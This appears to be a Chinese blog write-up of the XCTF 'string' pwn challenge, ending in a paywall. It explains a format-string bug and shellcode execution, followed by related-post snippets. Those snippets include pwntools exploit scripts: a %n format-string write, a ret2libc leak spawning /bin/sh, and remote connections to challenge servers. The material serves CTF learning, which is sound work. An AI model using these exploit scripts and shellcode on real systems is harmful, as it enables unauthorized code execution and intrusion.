攻防世界 pwn string

原创 已于 2022-07-06 16:57:21 修改 · 4.5k 阅读 · 23 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn

于 2021-11-15 00:17:30 首次发布
本文详细介绍了如何解决一个CTF挑战,涉及的主要技术包括alarm函数、格式化字符串漏洞和shellcode执行。通过理解程序流程,利用main函数中的内存泄露和sub_400BB9()的格式化字符串漏洞,找到并修改内存中的值,最终通过shellcode获取flag。解题过程中还提到了64位程序中%n的使用和偏移量计算,并给出了两种不同的解决方案。

攻防世界string应该是新手区数一数二的难题,难点在理解程序流程。

先观察主函数:

1

alarm函数

什么是alarm函数?

如上图所示,在做一些pwn题的时候,我们有时会遇到alarm(0x3Cu)函数。alarm函数中的参数0x3Cu是十六进制无符号数,即十进制对应60,所以该函数的作用是在程序运行60秒后,给进程发送SIGALRM信号,如果不另编写程序接受处理此信号,则默认结束此程序。

为什么要使用alarm函数?

一是比赛中常要远程连接服务器解题,官方不希望有队伍长时间解不出来题浪费服务器资源

二是能对动态调试产生一定影响,干扰选手解题

关闭alarm函数的方法

在命令行里:

# 将程序名为ProgrammName中的alarm替换为isnan
> sed -i s/alarm/isnan/g ./ProgrammName

不过这道题alarm函数对于程序影响不大,可以不用关闭。

程序流程

1

如图,系统分配内存给v4,v4数组里的内容分别是68和85。

main函数中重点关注

2

程序把v4和v4+1的地址给泄露出来了。

程序继续进入sub_400D72(),提示输入name后进入sub_400A7D(),这里不再赘述,不选择east和1就会被干掉。

选择east和1后我们进入sub_400BB9()

4

这里发现格式化字符串漏洞。

最后进入sub_400CA6()

5

发现若a1[0]等于a1[1],就可将v1变成可执行函数

(mmap是一种内存映射文件的方法),可通过read函数读入一串机器码,然后运行,这相当于是把shellcode送你脸上来了。

#综合分析

shellcode

我们的目的是拿到flag,此题中没有system函数,因此需要通过shellcode得到flag,而在sub_400CA6()中可以执行shellcode。

shellcode =asm(shellcraft.sh()) 
r.send(shellcode)

但是这几句有些时候会出错,在from pwn import *后加入如下语句则不会出错。

context(arch='amd64', os='linux', log_level='debug')

shellcode的条件

在程序流程中我们分析到了,必须满足a1[0]=a1[1]才能进行shellcode,因此我们接下来的目标就是让这两个值相等。sub_400CA6()中传入了a指针参数,因此a1[0],a1[1]其实就是v4[0]和v4[1],传递过程是通过sub_400D72传入到sub_400CA6()。

那么我们接下来的任务就是让v4[0]=v4[1]。

在分析程序流程时我们提到过,程序在main函数里泄露过v4的地址,而程序又在sub_400BB9()中存在格式化字符漏洞,那我们就可以得到v4地址后将v4[0]的值通过格式化字符串漏洞改为和v4[1]相等

1.得到v4的地址

r.recvuntil("secret[0] is ")
addr = int(r.recvuntil('\n')[
最低0.47元/天 解锁文章
攻防世界-wp-PWN-新手区-10-string
Scorpio_m7
04-12 430
题目来源: NUAACTF 题目描述: 菜鸡遇到了Dragon,有一位巫师可以帮助他逃离危险,但似乎需要一些要求 题目场景: 111.200.241.244:57862 题目附件: 1d3c852354df4609bf8e56fe8e9df316 题目思路: POP攻击链:通过格式化字符串漏洞修改v4[0]的值,使之与v4[1]相等。然后读入shellcode并运行。 解题过程: 拿到程序后,我们首先checksec一下,发现是64位,保护开启了CANNARY和NX,未开启 PIE,载入IDA64,找到ma
攻防世界pwn-string
a_silly_coder的博客
05-18 480
首先检查保护 将文件拖入64位ida 查看代码逻辑,发现这个代码有些复杂,但是大多数都是无效信息,很多输入都是指引程序进行的,扰乱我们的视线。 关键信息有:v3v4的数值地址都给出来了,然后查看sub_400D72函数 这里首先输入一个name,这是干扰输入,只要不超过0xC的长度即可。然后sub_400A7D也是干扰输入,只需要跟着代码输入就可以了。接着查看sub_400BB9与sub_400CA6 sub_400BB9这里很显然是有一个格式化字符串漏洞。 接着看s...
攻防世界pwn——string
qq_62076255的博客
11-05 862
攻防世界pwn——string
攻防世界PWN-string
Deeeelete的博客
11-15 883
题目:string 进PE或者checksec 64位程序 堆栈不可执行以及栈保护 运行一遍好像是一个文字游戏 剧情游戏?分析一波主要任务分支: 情况1:开始游戏,啥也不输入,60秒之后程序自动关闭 情况2:开始游戏,输入名称,名称超过了12个字符,直接出局 情况3:开始游戏,输入小于12个字符的名称,进入剧情问我走east还是up,如果选择up程序会一直死循环 情况4:开始游戏,输入小于12个字符的名称,进入剧情走east,然后问我选择1还是0,选择0,原地暴毙 情况5:开始游
[PWN](攻防世界)string
ljh15937的博客
09-21 1362
分析程序漏洞 了解程序的基本信息 64位小端序 开启了 Canary 保护,栈不可执行,未开启 PIE, 使用 IDA Pro 进行静态分析,由于该程序的执行流较为复杂,需要花些时间理清程序的具体执行流程 使用 GDB 进行动态调试,设置断点执行到 printf(&format, &format);,可以发现输入的地址 0xa98ac7 在栈顶的第二个8字节,根据64位程序的传参方式,该地址是格式化字符串的第 7 个参数,printf() 函数的第 8 个参数。
攻防世界-pwn-String
weixin_44558065的博客
10-19 409
本人为萌新,以下只是个人看法。
攻防世界pwn-level0详细步骤
m0_74047686的博客
02-28 1701
学习pwn开始,慢慢来不要急
攻防世界string
qq_25044201的博客
12-30 253
这道题是我在新手区见到的最难的一道题,涉及了格式化字符串,shellcode注入,最难的还是这个过程。繁杂,琐屑。 这句是最关键的,创建个内存然后作为指针函数。这里注入shellcode就可以。但是有个前提a[0]=a[1]我们要通过格式化字符串修改a[0]=85使得a[0]=a[1] ...
攻防世界 string
BengDouLove的博客
03-22 1279
这回终于做上了一道像一个小系统一样的题,有很多输入输出,程序逻辑也复杂了一点,比赛中我看都是这样的题,一直以来遇到这样的题都是不知所措,从这一道开始练手把 这是一个文字版RPG game… 一开始看main函数看不出来什么,注意到输出了secret 输出secret之后进入另一个函数,将v4的值传了进去 然后让输入名字,这里好像没有溢出,名字长度小于12 输入名字之后进入三个函数的第一个,开始...
攻防世界 - pwn - string
qq726232111的博客
03-25 564
A、程序分析 1、mov eax, ds:stdin@@GLIBC_2_0 mov [esp+8], eax ; stream mov dword ptr [esp+4], 64h ; n lea eax, [esp+9Ch+s] mov [esp], eax ; s call ...
攻防世界 Pwn string
MrTreebook的博客
11-22 229
攻防世界pwn string1.checksec看一下保护2.IDA分析一下源码 1.checksec看一下保护 除了PIE其他保护都开了 2.IDA分析一下源码 v3申请了8大小的内存空间,然后在前4个空间中存放了数字68,在后四个空间中存放了数字85。而v4中存放的是v3的内容,并不是68和85两个数字,而是存放了两个数字的内存空间地址。 ...
攻防世界新手区—string
hanabi_sh
10-15 745
攻防世界string,格式化字符漏洞
[攻防世界]string
逆向萌新的博客
06-20 327
[攻防世界]string详解
攻防世界 新手区string
winterze的博客
04-04 441
0x00 函数分析 基本信息 [*] '/home/ububtu/ctf/string' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) 64位,开启了Canary和...
攻防世界STRing
WangLal的博客
07-06 416
攻防世界PWN String的WP 基本的三步checksec,file,执行文件 这是一个64位文件,只有pIE没开。 由string这个题目猜测可能会是字符串漏洞 将下载好的附件扔进IDA里查看,点击main函数 main函数中找不到,那就在其他函数看一下。 点击 sub_400D72 要进入if条件中,输入的s的长度需小于12位 在sub_400BB9函数中看到了 printf前几句中存在%s与%ld,可以操作. 继续看下一个函数 (a1+4是指a1加4个字节,也就是一个整数类型所以这个就是a
攻防世界 string WP
Casuall的博客
07-28 1380
检查文件类型(file命令),检查安全措施(checksec命令)就不多说了,只有PIE没有开。 首先查看一下main函数,有一个sub_400996函数,这个函数就是负责打印一些信息。然后通过malloc申请了8个字节大小的内存,返回的指针为v3,将v3的值(指针的值为地址)存入v4,实际上v3和v4都指向了刚才申请的那块内存。然后赋值,将前四个字节赋值为68,后四个字节赋值为85。后面通过printf打印了v4和v4+4的值,其实就是68和85的地址。 下面有个sub_400D72(v4)函数,将v4
攻防世界PWN [GFSJ0469] string (不太正经的wp)
qq_52161487的博客
07-16 1167
拐角的光线很暗,暗得我看不清她的脸和表情,还有烦人的蚊子一直叮我的腿,但从来没有任何一个夏天的感觉能够如此真实。为了回家,勉为其难地,我答应了她。那个她曾和我说过,你们这些人整天对着电脑看书,一个劲儿地用一个女生头像的软件,这一横条一横条的是什么东西,一会goto一会mov的,就像是在走迷宫。前两天在我MP3上听的那首周董的歌你还记得嘛,远方传来风笛,我只在意有你的消息......”好吧,都已经走到现在了,回去未免沦为笑柄,也辜负了巫师小姐姐对我们的期望,我们要做的只能是硬着头皮走下去,来吧,
攻防世界-string-Writeup
SkYe's Blog
05-15 587
string [collapse title=“展开查看详情” status=“false”] 考点:格式化字符串任意地址写小数 题目前面有几个条件循环绕过,反编译就能看出,不再赘述。看漏洞函数: unsigned __int64 sub_400BB9() { int v1; // [rsp+4h] [rbp-7Ch] __int64 v2; // [rsp+8h] [rbp-78h] char format; // [rsp+10h] [rbp-70h] unsigned __int64
攻防世界 PWN
最新发布
12-12
攻防世界PWN有多个题目及对应的解题资料,以下是部分介绍: - **new_easypwn**:检查保护机制可知,该程序为amd64 - 64 - little架构,有部分RELRO,存在Canary,开启了NX和PIE。`readelf -h`显示ELF文件头信息,包含Magic、Class、Data等内容,可用于进一步的攻击点分析[^1]。 ```plaintext healer@healer-virtual-machine:~/Desktop/attachments$ checksec hello [*] '/home/healer/Desktop/attachments/hello' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled healer@healer-virtual-machine:~/Desktop/attachments$ readelf -h hello ELF Header: Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 Class: ELF64 Data: 2's complement, little endian Version: 1 (current) OS/ABI: UNIX - System V ABI Version: 0 Type: DYN (Shared object file) Machine: Advanced Micro Devices X86-64 Version: 0x1 Entry point address: 0xa00 Start of program headers: 64 (bytes into file) Start of section headers: 8648 (bytes into file) Flags: 0x0 Size of this header: 64 (bytes) Size of program headers: 56 (bytes) Number of program headers: 9 Size of section headers: 64 (bytes) Number of section headers: 29 Section header string table index: 28 ``` - **签到题**:这是较为简单的题目,无需复杂操作,直接连接远程服务即可获得shell并拿到flag。 ```python from pwn import * r = remote("111.198.29.45", 59457) r.interactive() r.close() ``` - **新手区某题**:利用`printf`返回字符个数的特性,将`pwnme`的值改成8。 ```python from pwn import * pwnme_addr = 0x804A068 payload = p32(pwnme_addr) + 'a'*4 + '%10$n' r = remote('111.200.241.244', 55843) r.recvuntil('name:') r.sendline('233') r.recvuntil('please:') r.sendline(payload) r.interactive() ``` - **[GFSJ0469] string**:题目有一段背景描述,“欢迎来到我的世界!我是一个巫师……可能会帮助你更好地了解它。”,但未给出解题代码,推测需结合这段信息进行后续分析[^4]。 - **pwn - 200**:通过泄露`write`地址,返回`main`函数,计算偏移找到`system`和`/bin/sh`的位置,最终获得shell。 ```python from pwn import * from LibcSearcher import * p = remote("111.200.241.244", 33327) elf = ELF('./pwn') write_got = elf.got['write'] write_plt = elf.plt['write'] main_addr = 0x080484BE payload = 'a' * (0x6c + 0x4) + p32(write_plt) + p32(main_addr) + p32(1) + p32(write_got) + p32(8) p.recvline() p.sendline(payload) write_addr = u32(p.recv(4)) print hex(write_addr) libc = LibcSearcher('write', write_addr) libc_base = write_addr - libc.dump('write') system_addr = libc_base + libc.dump('system') binsh = libc_base + libc.dump('str_bin_sh') payload = 'a' * (0x6c + 0x4) + p32(system_addr) + 'junk' + p32(binsh) p.sendline(payload) p.interactive() ```
评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值